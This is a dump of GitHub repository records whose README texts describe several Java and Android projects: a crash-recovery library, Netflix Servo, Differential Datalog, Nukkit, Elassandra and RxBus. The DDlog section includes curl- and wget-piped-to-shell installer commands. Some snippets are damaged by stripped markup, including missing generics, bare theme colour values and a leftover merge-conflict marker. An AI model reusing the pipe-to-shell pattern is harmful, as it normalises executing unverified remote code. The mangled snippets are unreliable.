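                + throwClassName + ""."" + throwMethodName + "":"" + throwLineNumber);
    }

    @Override
    public void throwable(Throwable throwable) {
        Log.e(""Recovery"", ""throwable"", throwable);
    }
}
```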
## **Custom Theme**
You can customize UI by setting these properties in your styles file:
```xml
#2E2E36#2E2E36#BDBDBD#3C4350#FFFFFF#C6C6C6
```
## **Crash File Path**
> {SDCard Dir}/Android/data/{packageName}/files/recovery_crash/
----
## **Update history**
* `VERSION-0.0.5`——**Support silent recovery**
* `VERSION-0.0.6`——**Strengthen the protection of silent restore mode**
* `VERSION-0.0.7`——**Add confusion configuration**
* `VERSION-0.0.8`——**Add the skip Activity features,method:skip()**
* `VERSION-0.0.9`——**Update the UI and solve some problems**
* `VERSION-0.1.0`——**Optimization of crash exception delivery, initial Recovery framework can be in any position, release the official version-0.1.0**
* `VERSION-0.1.3`——**Add 'no-op' support**
* `VERSION-0.1.4`——**update default theme**
* `VERSION-0.1.5`——**fix 8.0+ hook bug**
* `VERSION-0.1.6`——**update**
* `VERSION-1.0.0`——**Fix 8.0 compatibility issue**
## **About**
* **Blog**:[https://zhengxiaoyong.com](https://zhengxiaoyong.com)
* **Wechat**:
![](https://raw.githubusercontent.com/Sunzxyong/ImageRepository/master/qrcode.jpg)
# **LICENSE**
```
Copyright 2016 zhengxiaoyong
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
```
"
Netflix/servo,master,1409,292,2011-12-16T21:09:27Z,5399,1,Netflix Application Monitoring Library,,"# DEPRECATED
This project receives minimal maintenance to keep software that relies on it working. There
is no active development or planned feature improvement. For any new projects it is recommended
to use the [Spectator] library instead.
For more details see the [Servo comparison] page in the Spectator docs.
[Spectator]: https://github.com/Netflix/spectator
[Servo comparison]: http://netflix.github.io/spectator/en/latest/intro/servo-comparison/
# No-Op Registry
As of version 0.13.0, the default monitor registry is a no-op implementation to minimize
the overhead for legacy apps that still happen to have some usage of Servo. If the previous
behavior is needed, then set the following system property:
```
com.netflix.servo.DefaultMonitorRegistry.registryClass=com.netflix.servo.jmx.JmxMonitorRegistry
```
# Servo: Application Metrics in Java
> servo v. : WATCH OVER, OBSERVE
>Latin.
Servo provides a simple interface for exposing and publishing application metrics in Java. The primary goals are:
* **Leverage JMX**: JMX is the standard monitoring interface for Java and can be queried by many existing tools.
* **Keep It Simple**: It should be trivial to expose metrics and publish metrics without having to write lots of code such as [MBean interfaces](http://docs.oracle.com/javase/tutorial/jmx/mbeans/standard.html).
* **Flexible Publishing**: Once metrics are exposed, it should be easy to regularly poll the metrics and make them available for internal reporting systems, logs, and services like [Amazon CloudWatch](http://aws.amazon.com/cloudwatch/).
This has already been implemented inside of Netflix and most of our applications currently use it.
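As a quick, hedged illustration of the basic idea (a counter registered with the default registry; the class and metric names here are made up, and note that since 0.13.0 the default registry is a no-op unless the JMX registry property shown above is set):
```
import com.netflix.servo.DefaultMonitorRegistry;
import com.netflix.servo.monitor.BasicCounter;
import com.netflix.servo.monitor.MonitorConfig;

public class RequestMetrics {
    private final BasicCounter requests =
            new BasicCounter(MonitorConfig.builder(""requests"").build());

    public RequestMetrics() {
        // Registering the monitor exposes it (e.g. via JMX) so pollers can publish it.
        DefaultMonitorRegistry.getInstance().register(requests);
    }

    public void onRequest() {
        requests.increment();
    }
}
```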
## Project Details
### Build Status
[![Build Status](https://travis-ci.org/Netflix/servo.svg)](https://travis-ci.org/Netflix/servo/builds)
### Versioning
Servo is released with a 0.X.Y version because it has not yet reached full API stability.
Given a version number MAJOR.MINOR.PATCH, increment the:
* MINOR version when there are binary incompatible changes, and
* PATCH version when new functionality or bug fixes are backwards compatible.
### Documentation
* [GitHub Wiki](https://github.com/Netflix/servo/wiki)
* [Javadoc](http://netflix.github.io/servo/current/servo-core/docs/javadoc/)
### Communication
* Google Group: [Netflix Atlas](https://groups.google.com/forum/#!forum/netflix-atlas)
* For bugs, feedback, questions and discussion please use [GitHub Issues](https://github.com/Netflix/servo/issues).
* If you want to help contribute to the project, see [CONTRIBUTING.md](https://github.com/Netflix/servo/blob/master/CONTRIBUTING.md) for details.
## Project Usage
### Build
To build the Servo project:
```
$ git clone https://github.com/Netflix/servo.git
$ cd servo
$ ./gradlew build
```
More details can be found on the [Getting Started](https://github.com/Netflix/servo/wiki/Getting-Started) page of the wiki.
### Binaries
Binaries and dependency information can be found at [Maven Central](http://search.maven.org/#search%7Cga%7C1%7Ccom.netflix.servo).
Maven Example:
```
<dependency>
  <groupId>com.netflix.servo</groupId>
  <artifactId>servo-core</artifactId>
  <version>0.12.7</version>
</dependency>
```
Ivy Example:
```
<dependency org=""com.netflix.servo"" name=""servo-core"" rev=""0.12.7"" />
```
## License
Copyright 2012-2016 Netflix, Inc.
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"
vmware/differential-datalog,master,1332,115,2018-03-20T20:14:11Z,309115,136,DDlog is a programming language for incremental computation. It is well suited for writing programs that continuously update their output in response to input changes. A DDlog programmer does not write incremental algorithms; instead they specify the desired input-output mapping in a declarative manner.,datalog ddlog incremental programming-language rust,"[![License: MIT](https://img.shields.io/badge/License-MIT-green.svg)](https://opensource.org/licenses/MIT)
[![CI workflow](https://github.com/vmware/differential-datalog/actions/workflows/main.yml/badge.svg)](https://github.com/vmware/differential-datalog/actions)
[![pipeline status](https://gitlab.com/ddlog/differential-datalog/badges/master/pipeline.svg)](https://gitlab.com/ddlog/differential-datalog/commits/master)
[![rustc](https://img.shields.io/badge/rustc-1.52.1+-blue.svg)](https://blog.rust-lang.org/2021/05/10/Rust-1.52.1.html)
[![Gitter chat](https://badges.gitter.im/vmware/differential-datalog.png)](https://gitter.im/vmware/differential-datalog)
# Differential Datalog (DDlog)
DDlog is a programming language for *incremental computation*. It is well suited for
writing programs that continuously update their output in response to input changes. With DDlog,
the programmer does not need to worry about writing incremental algorithms.
Instead they specify the desired input-output mapping in a declarative manner, using a dialect of Datalog.
The DDlog compiler then synthesizes an efficient incremental implementation.
DDlog is based on [Frank McSherry's](https://github.com/frankmcsherry/)
excellent [differential dataflow](https://github.com/TimelyDataflow/differential-dataflow) library.
DDlog has the following key properties:
1. **Relational**: A DDlog program transforms a set of input relations (or tables) into a set of output relations.
It is thus well suited for applications that operate on relational data, ranging from real-time analytics to
cloud management systems and static program analysis tools.
2. **Dataflow-oriented**: At runtime, a DDlog program accepts a *stream of updates* to input relations.
Each update inserts, deletes, or modifies a subset of input records. DDlog responds to an input update
by outputting an update to its output relations.
3. **Incremental**: DDlog processes input updates by performing the minimum amount of work
necessary to compute changes to output relations. This has significant performance benefits for many queries.
4. **Bottom-up**: DDlog starts from a set of input facts and
computes *all* possible derived facts by following user-defined rules, in a bottom-up fashion. In
contrast, top-down engines are optimized to answer individual user queries without computing all
possible facts ahead of time. For example, given a Datalog program that computes pairs of connected
vertices in a graph, a bottom-up engine maintains the set of all such pairs. A top-down engine, on
the other hand, is triggered by a user query to determine whether a pair of vertices is connected
and handles the query by searching for a derivation chain back to ground facts. The bottom-up
approach is preferable in applications where all derived facts must be computed ahead of time and in
applications where the cost of initial computation is amortized across a large number of queries.
5. **In-memory**: DDlog stores and processes data in memory. In a typical use case, a DDlog program
is used in conjunction with a persistent database, with database records being fed to DDlog as
ground facts and the derived facts computed by DDlog being written back to the database.
At the moment, DDlog can only operate on databases that completely fit the memory of a single
machine. We are working on a distributed version of DDlog that will be able to
partition its state and computation across multiple machines.
6. **Typed**: In its classical textbook form Datalog is more of a mathematical formalism than a
practical tool for programmers. In particular, pure Datalog does not have concepts like types,
arithmetics, strings or functions. To facilitate writing of safe, clear, and concise code, DDlog
extends pure Datalog with:
1. A powerful type system, including Booleans, unlimited precision integers, bitvectors, floating point numbers, strings,
tuples, tagged unions, vectors, sets, and maps. All of these types can be
stored in DDlog relations and manipulated by DDlog rules. Thus, with DDlog
one can perform relational operations, such as joins, directly over structured data,
without having to flatten it first (as is often done in SQL databases).
2. Standard integer, bitvector, and floating point arithmetic.
3. A simple procedural language that allows expressing many computations natively in DDlog without resorting to external functions.
4. String operations, including string concatenation and interpolation.
5. Syntactic sugar for writing imperative-style code using for/let/assignments.
7. **Integrated**: while DDlog programs can be run interactively via a command line interface, its
primary use case is to integrate with other applications that require deductive database
functionality. A DDlog program is compiled into a Rust library that can be linked against a Rust,
C/C++, Java, or Go program (bindings for other languages can be easily added). This enables good performance,
but somewhat limits the flexibility, as changes to the relational schema or rules require re-compilation.
## Documentation
- Follow the [tutorial](doc/tutorial/tutorial.md) for a step-by-step introduction to DDlog.
- DDlog [language reference](doc/language_reference/language_reference.md).
- DDlog [command reference](doc/command_reference/command_reference.md) for writing and testing your own Datalog programs.
- [How to](doc/java_api.md) use DDlog from Java.
- [How to](doc/c_tutorial/c_tutorial.rst) use DDlog from C.
- [How to](go/README.md) use DDlog from Go and [Go API documentation](https://pkg.go.dev/github.com/vmware/differential-datalog/go/pkg/ddlog).
- [How to](test/datalog_tests/rust_api_test) use DDlog from Rust (by example)
- [Tutorial](doc/profiling/profiling.md) on profiling DDlog programs
- [DDlog overview paper](doc/datalog2.0-workshop/paper.pdf), Datalog 2.0 workshop, 2019.
## Installation
### Installing DDlog from a binary release
To install a precompiled version of DDlog, download the [latest binary release](https://github.com/vmware/differential-datalog/releases), extract it from archive, add `ddlog/bin` to your `$PATH`, and set `$DDLOG_HOME` to point to the `ddlog` directory. You will also need to install the Rust toolchain (see instructions below).
If you're using OS X, you will need to override the binary's security settings through [these instructions](https://support.apple.com/guide/mac-help/open-a-mac-app-from-an-unidentified-developer-mh40616/mac). Otherwise, when first running the DDlog compiler (through calling `ddlog`), you will get the following warning dialog:
```
""ddlog"" cannot be opened because the developer cannot be verified.
macOS cannot verify that this app is free from malware.
```
You are now ready to [start coding in DDlog](doc/tutorial/tutorial.md).
### Compiling DDlog from sources
#### Installing dependencies manually
- Haskell [stack](https://github.com/commercialhaskell/stack):
```
wget -qO- https://get.haskellstack.org/ | sh
```
- Rust toolchain v1.52.1 or later:
```
curl https://sh.rustup.rs -sSf | sh
. $HOME/.cargo/env
rustup component add rustfmt
rustup component add clippy
```
**Note:** The `rustup` script adds path to Rust toolchain binaries (typically, `$HOME/.cargo/bin`)
to `~/.profile`, so that it becomes effective at the next login attempt. To configure your current
shell run `source $HOME/.cargo/env`.
- JDK, e.g.:
```
apt install default-jdk
```
- Google FlatBuffers library. Download and build FlatBuffers release 1.11.0 from
[github](https://github.com/google/flatbuffers/releases/tag/v1.11.0). Make sure
that the `flatc` tool is in your `$PATH`. Additionally, make sure that FlatBuffers
Java classes are in your `$CLASSPATH`:
```
./tools/install-flatbuf.sh
cd flatbuffers
export CLASSPATH=`pwd`""/java"":$CLASSPATH
export PATH=`pwd`:$PATH
cd ..
```
- Static versions of the following libraries: `libpthread.a`, `libc.a`, `libm.a`, `librt.a`, `libutil.a`,
`libdl.a`, `libgmp.a`, and `libstdc++.a` can be installed from distro-specific packages. On Ubuntu:
```
apt install libc6-dev libgmp-dev
```
On Fedora:
```
dnf install glibc-static gmp-static libstdc++-static
```
#### Building
To build the software once you've installed the dependencies using one of the
above methods, clone this repository and set `$DDLOG_HOME` variable to point
to the root of the repository. Run
```
stack build
```
anywhere inside the repository to build the DDlog compiler.
To install DDlog binaries in Haskell stack's default binary directory:
```
stack install
```
To install to a different location:
```
stack install --local-bin-path
```
To test basic DDlog functionality:
```
stack test --ta '-p path'
```
**Note:** this takes a few minutes
You are now ready to [start coding in DDlog](doc/tutorial/tutorial.md).
### vim syntax highlighting
The easiest way to enable differential datalog syntax highlighting for `.dl` files in Vim is by
creating a symlink from `/tools/vim/syntax/dl.vim` into `~/.vim/syntax/`.
If you are using a plugin manager you may be able to directly consume the file from the upstream
repository as well. In the case of [`Vundle`](https://github.com/VundleVim/Vundle.vim), for example,
configuration could look as follows:
```vim
call vundle#begin('~/.config/nvim/bundle')
...
Plugin 'vmware/differential-datalog', {'rtp': 'tools/vim'} <---- relevant line
...
call vundle#end()
```
## Debugging with GHCi
To run the test suite with the GHCi debugger:
```
stack ghci --ghci-options -isrc --ghci-options -itest differential-datalog:differential-datalog-test
```
and type `do main` in the command prompt.
## Building with profiling info enabled
```
stack clean
```
followed by
```
stack build --profile
```
or
```
stack test --profile
```
"
CloudburstMC/Nukkit,master,1179,415,2017-12-04T19:55:58Z,27217,169,Cloudburst Nukkit - Nuclear-Powered Minecraft: Bedrock Edition Server Software,bedrock bedrock-edition bedrock-engine java mcbe mcbe-server mcpe mcpe-server minecraft minecraft-server nukkit pocket-edition,"![nukkit](.github/images/banner.png)
[![License: GPL v3](https://img.shields.io/badge/License-GPL%20v3-blue.svg)](LICENSE)
[![Build Status](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master/badge/icon)](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master/)
[![Discord](https://img.shields.io/discord/393465748535640064.svg)](https://discord.gg/5PzMkyK)
Introduction
-------------
Nukkit is nuclear-powered server software for Minecraft: Pocket Edition.
It has a few key advantages over other server software:
* Written in Java, Nukkit is faster and more stable.
* Having a friendly structure, it's easy to contribute to Nukkit's development and rewrite plugins from other platforms into Nukkit plugins.
Nukkit is still **under improvement**, and we welcome contributions.
Links
--------------------
* __[News](https://nukkitx.com)__
* __[Forums](https://nukkitx.com/forums)__
* __[Discord](https://discord.gg/5PzMkyK)__
* __[Download](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master)__
* __[Plugins](https://nukkitx.com/resources/categories/nukkit-plugins.1)__
* __[Wiki](https://nukkitx.com/wiki/nukkit)__
Contributing
-------------
Please read the [CONTRIBUTING](.github/CONTRIBUTING.md) guide before submitting any issue. Issues with insufficient information or in the wrong format will be closed and will not be reviewed.
Build JAR file
-------------
- `git clone https://github.com/CloudburstMC/Nukkit`
- `cd Nukkit`
- `git submodule update --init`
- `./gradlew shadowJar`
The compiled JAR can be found in the `target/` directory.
Running
-------------
Simply run `java -jar nukkit-1.0-SNAPSHOT.jar`.
Plugin API
-------------
Information on Nukkit's API can be found at the [wiki](https://nukkitx.com/wiki/nukkit/).
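As a rough sketch of what a minimal plugin class can look like (a hypothetical example; the required plugin.yml metadata and build setup are omitted, see the wiki for the authoritative API):
```
import cn.nukkit.plugin.PluginBase;

public class ExamplePlugin extends PluginBase {
    @Override
    public void onEnable() {
        getLogger().info(""ExamplePlugin enabled"");
    }

    @Override
    public void onDisable() {
        getLogger().info(""ExamplePlugin disabled"");
    }
}
```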
Docker
-------------
Running Nukkit in [Docker](https://www.docker.com/) (17.05+ or higher).
Build image from the source,
```
docker build -t nukkit .
```
Run once to generate the `nukkit-data` volume, default settings, and choose language,
```
docker run -it -p 19132:19132/udp -v nukkit-data:/data nukkit
```
Docker Compose
-------------
Use [docker-compose](https://docs.docker.com/compose/overview/) to start server on port `19132` and with `nukkit-data` volume,
```
docker-compose up -d
```
Kubernetes & Helm
-------------
Validate the chart:
`helm lint charts/nukkit`
Dry run and print out rendered YAML:
`helm install --dry-run --debug nukkit charts/nukkit`
Install the chart:
`helm install nukkit charts/nukkit`
Or, with some different values:
```
helm install nukkit \
--set image.tag=""arm64"" \
--set service.type=""LoadBalancer"" \
charts/nukkit
```
Or, the same but with a custom values from a file:
```
helm install nukkit \
-f helm-values.local.yaml \
charts/nukkit
```
Upgrade the chart:
`helm upgrade nukkit charts/nukkit`
Testing after deployment:
`helm test nukkit`
Completely remove the chart:
`helm uninstall nukkit`
"
strapdata/elassandra,v6.8.4-strapdata,1708,198,2015-08-22T13:52:08Z,457428,60,Elassandra = Elasticsearch + Apache Cassandra,aggregation cassandra completion elasticsearch fuzzy-search kibana logstash lucene masterless mission-critical nosql rest-api search spark,"# Elassandra [![Build Status](https://travis-ci.org/strapdata/elassandra.svg)](https://travis-ci.org/strapdata/elassandra) [![Documentation Status](https://readthedocs.org/projects/elassandra/badge/?version=latest)](https://elassandra.readthedocs.io/en/latest/?badge=latest) [![GitHub release](https://img.shields.io/github/v/release/strapdata/elassandra.svg)](https://github.com/strapdata/elassandra/releases/latest)
[![Twitter](https://img.shields.io/twitter/follow/strapdataio?style=social)](https://twitter.com/strapdataio)
![Elassandra Logo](elassandra-logo.png)
## [http://www.elassandra.io/](http://www.elassandra.io/)
Elassandra is an [Apache Cassandra](http://cassandra.apache.org) distribution including an [Elasticsearch](https://github.com/elastic/elasticsearch) search engine.
Elassandra is a multi-master multi-cloud database and search engine with support for replicating across multiple datacenters in active/active mode.
Elasticsearch code is embedded in Cassandra nodes, providing advanced search features on Cassandra tables, and Cassandra serves as an Elasticsearch data and configuration store.
![Elassandra architecture](/docs/elassandra/source/images/elassandra1.jpg)
Elassandra supports Cassandra vnodes and scales horizontally by adding more nodes without the need to reshard indices.
Project documentation is available at [doc.elassandra.io](http://doc.elassandra.io).
## Benefits of Elassandra
For Cassandra users, elassandra provides Elasticsearch features :
* Cassandra updates are indexed in Elasticsearch.
* Full-text and spatial search on your Cassandra data.
* Real-time aggregation (does not require Spark or Hadoop to GROUP BY)
* Provide search on multiple keyspaces and tables in one query.
* Provide automatic schema creation and support nested documents using [User Defined Types](https://docs.datastax.com/en/cql/3.1/cql/cql_using/cqlUseUDT.html).
* Provide read/write JSON REST access to Cassandra data.
* Numerous Elasticsearch plugins and products like [Kibana](https://www.elastic.co/guide/en/kibana/current/introduction.html).
* Manage concurrent elasticsearch mappings changes and applies batched atomic CQL schema changes.
* Support [Elasticsearch ingest processors](https://www.elastic.co/guide/en/elasticsearch/reference/master/ingest.html) allowing to transform input data.
For Elasticsearch users, elassandra provides useful features :
* Elassandra is masterless. Cluster state is managed through [cassandra lightweight transactions](http://www.datastax.com/dev/blog/lightweight-transactions-in-cassandra-2-0).
* Elassandra is a sharded multi-master database, where Elasticsearch is sharded master-slave. Thus, Elassandra has no Single Point Of Write, helping to achieve high availability.
* Elassandra inherits Cassandra data repair mechanisms (hinted handoff, read repair and nodetool repair) providing support for **cross datacenter replication**.
* When adding a node to an Elassandra cluster, only data pulled from existing nodes are re-indexed in Elasticsearch.
* Cassandra could be your unique datastore for indexed and non-indexed data. It's easier to manage and secure. Source documents are now stored in Cassandra, reducing disk space if you need a NoSQL database and Elasticsearch.
* Write operations are not restricted to one primary shard, but distributed across all Cassandra nodes in a virtual datacenter. The number of shards does not limit your write throughput. Adding elassandra nodes increases both read and write throughput.
* Elasticsearch indices can be replicated among many Cassandra datacenters, allowing write to the closest datacenter and search globally.
* The [cassandra driver](http://www.planetcassandra.org/client-drivers-tools/) is Datacenter and Token aware, providing automatic load-balancing and failover.
* Elassandra efficiently stores Elasticsearch documents in binary SSTables without any JSON overhead.
## Quick start
* [Quick Start](http://doc.elassandra.io/en/latest/quickstart.html) guide to run a single node Elassandra cluster in docker.
* [Deploy Elassandra by launching a Google Kubernetes Engine](./docs/google-kubernetes-tutorial.md):
[![Open in Cloud Shell](https://gstatic.com/cloudssh/images/open-btn.png)](https://console.cloud.google.com/cloudshell/open?git_repo=https://github.com/strapdata/elassandra-google-k8s-marketplace&tutorial=docs/google-kubernetes-tutorial.md)
## Upgrade Instructions
#### Elassandra 6.8.4.2+
<<<<<<< HEAD
Since version 6.8.4.2, the gossip X1 application state can be compressed using a system property. Enabling this settings allows the creation of a lot of virtual indices.
Before enabling this setting, upgrade all the 6.8.4.x nodes to the 6.8.4.2 (or higher). Once all the nodes are in 6.8.4.2, they are able to decompress the application state even if the settings isn't yet configured locally.
#### Elassandra 6.2.3.25+
Elassandra uses the Cassandra GOSSIP protocol to manage the Elasticsearch routing table, and Elassandra 6.8.4.2+ adds support for compression of
the X1 application state to increase the maximum number of Elasticsearch indices. For backward compatibility, the compression is disabled by default,
but once all your nodes are upgraded to version 6.8.4.2+, you should enable the X1 compression by adding **-Des.compress_x1=true** to your **conf/jvm.options** and rolling-restarting all nodes.
Nodes running version 6.8.4.2+ are able to read both compressed and uncompressed X1.
#### Elassandra 6.2.3.21+
Before version 6.2.3.21, the Cassandra replication factor for the **elastic_admin** keyspace (and elastic_admin_[datacenter.group]) was automatically adjusted to the
number of nodes of the datacenter. Since version 6.2.3.21 and because it has a performance impact on large clusters, it's now up to your Elassandra administrator to
properly adjust the replication factor for this keyspace. Keep in mind that Elasticsearch mapping updates rely on a PAXOS transaction that requires QUORUM nodes to succeed,
so replication factor should be at least 3 on each datacenter.
#### Elassandra 6.2.3.19+
Elassandra 6.2.3.19 metadata version now relies on the Cassandra table **elastic_admin.metadata_log** (that was **elastic_admin.metadata** from 6.2.3.8 to 6.2.3.18)
to keep the elasticsearch mapping update history and automatically recover from a possible PAXOS write timeout issue.
When upgrading the first node of a cluster, Elassandra automatically copy the current **metadata.version** into the new **elastic_admin.metadata_log** table.
To avoid Elasticsearch mapping inconsistency, you must avoid mapping update while the rolling upgrade is in progress. Once all nodes are upgraded,
the **elastic_admin.metadata** table is no longer used and can be removed. Then, you can get the mapping update history from the new **elastic_admin.metadata_log** and know
which node has updated the mapping, when and for which reason.
#### Elassandra 6.2.3.8+
Elassandra 6.2.3.8+ now fully manages the elasticsearch mapping in the CQL schema through the use of CQL schema extensions (see *system_schema.tables*, column *extensions*). These table extensions and the CQL schema updates resulting from elasticsearch index creation/modification are applied in batched atomic schema updates to ensure consistency when concurrent updates occur. Moreover, these extensions are stored in binary and support partial updates to be more efficient. As a result, the elasticsearch mapping is no longer stored in the *elastic_admin.metadata* table.
WARNING: During the rolling upgrade, elasticsearch mapping changes are not propagated between nodes running the new and the old versions, so don't change your mapping while you're upgrading. Once all your nodes have been upgraded to 6.2.3.8+ and validated, apply the following CQL statements to remove useless elasticsearch metadata:
```bash
ALTER TABLE elastic_admin.metadata DROP metadata;
ALTER TABLE elastic_admin.metadata WITH comment = '';
```
WARNING: Due to CQL table extensions used by Elassandra, some old versions of **cqlsh** may lead to the following error message **""'module' object has no attribute 'viewkeys'.""**. This comes from the old python cassandra driver embedded in Cassandra and has been reported in [CASSANDRA-14942](https://issues.apache.org/jira/browse/CASSANDRA-14942). Possible workarounds:
* Use the **cqlsh** embedded with Elassandra
* Install a recent version of the **cqlsh** utility (*pip install cqlsh*) or run it from a docker image:
```bash
docker run -it --rm strapdata/cqlsh:0.1 node.example.com
```
#### Elassandra 6.x changes
* Elasticsearch now supports only one document type per index backed by one Cassandra table. Unless you specify an elasticsearch type name in your mapping, data is stored in a cassandra table named **""_doc""**. If you want to search many cassandra tables, you now need to create and search many indices.
* Elasticsearch 6.x manages shard consistency through several metadata fields (_primary_term, _seq_no, _version) that are not used in elassandra because replication is fully managed by cassandra.
## Installation
Ensure Java 8 is installed and `JAVA_HOME` points to the correct location.
* [Download](https://github.com/strapdata/elassandra/releases) and extract the distribution tarball
* Define the CASSANDRA_HOME environment variable : `export CASSANDRA_HOME=`
* Run `bin/cassandra -e`
* Run `bin/nodetool status`
* Run `curl -XGET localhost:9200/_cluster/state`
#### Example
Try indexing a document on a non-existing index:
```bash
curl -XPUT 'http://localhost:9200/twitter/_doc/1?pretty' -H 'Content-Type: application/json' -d '{
""user"": ""Poulpy"",
""post_date"": ""2017-10-04T13:12:00Z"",
""message"": ""Elassandra adds dynamic mapping to Cassandra""
}'
```
Then look-up in Cassandra:
```bash
bin/cqlsh -e ""SELECT * from twitter.\""_doc\""""
```
Behind the scenes, Elassandra has created a new Keyspace `twitter` and table `_doc`.
```CQL
admin@cqlsh>DESC KEYSPACE twitter;
CREATE KEYSPACE twitter WITH replication = {'class': 'NetworkTopologyStrategy', 'DC1': '1'} AND durable_writes = true;
CREATE TABLE twitter.""_doc"" (
""_id"" text PRIMARY KEY,
message list,
post_date list,
user list
) WITH bloom_filter_fp_chance = 0.01
AND caching = {'keys': 'ALL', 'rows_per_partition': 'NONE'}
AND comment = ''
AND compaction = {'class': 'org.apache.cassandra.db.compaction.SizeTieredCompactionStrategy', 'max_threshold': '32', 'min_threshold': '4'}
AND compression = {'chunk_length_in_kb': '64', 'class': 'org.apache.cassandra.io.compress.LZ4Compressor'}
AND crc_check_chance = 1.0
AND dclocal_read_repair_chance = 0.1
AND default_time_to_live = 0
AND gc_grace_seconds = 864000
AND max_index_interval = 2048
AND memtable_flush_period_in_ms = 0
AND min_index_interval = 128
AND read_repair_chance = 0.0
AND speculative_retry = '99PERCENTILE';
CREATE CUSTOM INDEX elastic__doc_idx ON twitter.""_doc"" () USING 'org.elassandra.index.ExtendedElasticSecondaryIndex';
```
By default, multi valued Elasticsearch fields are mapped to Cassandra list.
Now, insert a row with CQL :
```CQL
INSERT INTO twitter.""_doc"" (""_id"", user, post_date, message)
VALUES ( '2', ['Jimmy'], [dateof(now())], ['New data is indexed automatically']);
SELECT * FROM twitter.""_doc"";
_id | message | post_date | user
-----+--------------------------------------------------+-------------------------------------+------------
2 | ['New data is indexed automatically'] | ['2019-07-04 06:00:21.893000+0000'] | ['Jimmy']
1 | ['Elassandra adds dynamic mapping to Cassandra'] | ['2017-10-04 13:12:00.000000+0000'] | ['Poulpy']
(2 rows)
```
Then search for it with the Elasticsearch API:
```bash
curl ""localhost:9200/twitter/_search?q=user:Jimmy&pretty""
```
And here is a sample response :
```JSON
{
""took"" : 3,
""timed_out"" : false,
""_shards"" : {
""total"" : 1,
""successful"" : 1,
""skipped"" : 0,
""failed"" : 0
},
""hits"" : {
""total"" : 1,
""max_score"" : 0.6931472,
""hits"" : [
{
""_index"" : ""twitter"",
""_type"" : ""_doc"",
""_id"" : ""2"",
""_score"" : 0.6931472,
""_source"" : {
""post_date"" : ""2019-07-04T06:00:21.893Z"",
""message"" : ""New data is indexed automatically"",
""user"" : ""Jimmy""
}
}
]
}
}
```
## Support
* Commercial support is available through [Strapdata](http://www.strapdata.com/).
* Community support available via [elassandra google groups](https://groups.google.com/forum/#!forum/elassandra).
* Post feature requests and bugs on https://github.com/strapdata/elassandra/issues
## License
```
This software is licensed under the Apache License, version 2 (""ALv2""), quoted below.
Copyright 2015-2018, Strapdata (contact@strapdata.com).
Licensed under the Apache License, Version 2.0 (the ""License""); you may not
use this file except in compliance with the License. You may obtain a copy of
the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations under
the License.
```
## Acknowledgments
* Elasticsearch, Logstash, Beats and Kibana are trademarks of Elasticsearch BV, registered in the U.S. and in other countries.
* Apache Cassandra, Apache Lucene, Apache, Lucene and Cassandra are trademarks of the Apache Software Foundation.
* Elassandra is a trademark of Strapdata SAS.
"
AndroidKnife/RxBus,master,2143,223,2015-11-25T10:36:57Z,195,1,Event Bus By RxJava.,rxandroid rxbus rxjava rxjava2,"RxBus - An event bus by [ReactiveX/RxJava](https://github.com/ReactiveX/RxJava)/[ReactiveX/RxAndroid](https://github.com/ReactiveX/RxAndroid)
=============================
This is an event bus designed to allow your application to communicate efficiently.
I have used it in many projects, and now I think someone else might like it, so I am publishing it.
RxBus supports annotations (@Produce/@Subscribe) and lets you produce/subscribe on other threads
such as MAIN_THREAD, NEW_THREAD, IO, COMPUTATION, TRAMPOLINE, IMMEDIATE, and even the EXECUTOR and HANDLER threads;
more in [EventThread](rxbus/src/main/java/com/hwangjr/rxbus/thread/EventThread.java).
RxBus also provides an event tag to qualify events: the method's first (and only) parameter and the tag together define the event type.
**Thanks to:**
[square/otto](https://github.com/square/otto)
[greenrobot/EventBus](https://github.com/greenrobot/EventBus)
Usage
--------
Just 2 Steps:
**STEP 1**
Add dependency to your gradle file:
```groovy
compile 'com.hwangjr.rxbus:rxbus:3.0.0'
```
Or maven:
``` xml
<dependency>
  <groupId>com.hwangjr.rxbus</groupId>
  <artifactId>rxbus</artifactId>
  <version>3.0.0</version>
  <type>aar</type>
</dependency>
```
**TIP:** If you also use [JakeWharton/timber](https://github.com/JakeWharton/timber) to log your messages, you may need to exclude timber (from version 1.0.4, the timber dependency was updated from [AndroidKnife/Utils/timber](https://github.com/AndroidKnife/Utils/tree/master/timber) to JakeWharton's):
``` groovy
compile ('com.hwangjr.rxbus:rxbus:3.0.0') {
exclude group: 'com.jakewharton.timber', module: 'timber'
}
```
Snapshots of the development version are available in [Sonatype's `snapshots` repository](https://oss.sonatype.org/content/repositories/snapshots/).
**STEP 2**
Just use the provided bus instance (any-thread enforcement):
``` java
com.hwangjr.rxbus.RxBus
```
Or, a better choice, wrap a Bus instance in your own RxBus holder:
``` java
public static final class RxBus {
private static Bus sBus;
public static synchronized Bus get() {
if (sBus == null) {
sBus = new Bus();
}
return sBus;
}
}
```
Add the code where you want to produce/subscribe events, and register and unregister the class.
``` java
public class MainActivity extends AppCompatActivity {
...
@Override
protected void onCreate(Bundle savedInstanceState) {
...
RxBus.get().register(this);
...
}
@Override
protected void onDestroy() {
...
RxBus.get().unregister(this);
...
}
@Subscribe
public void eat(String food) {
// purpose
}
@Subscribe(
thread = EventThread.IO,
tags = {
@Tag(BusAction.EAT_MORE)
}
)
public void eatMore(List foods) {
// purpose
}
@Produce
public String produceFood() {
return ""This is bread!"";
}
@Produce(
thread = EventThread.IO,
tags = {
@Tag(BusAction.EAT_MORE)
}
)
public List produceMoreFood() {
return Arrays.asList(""This is breads!"");
}
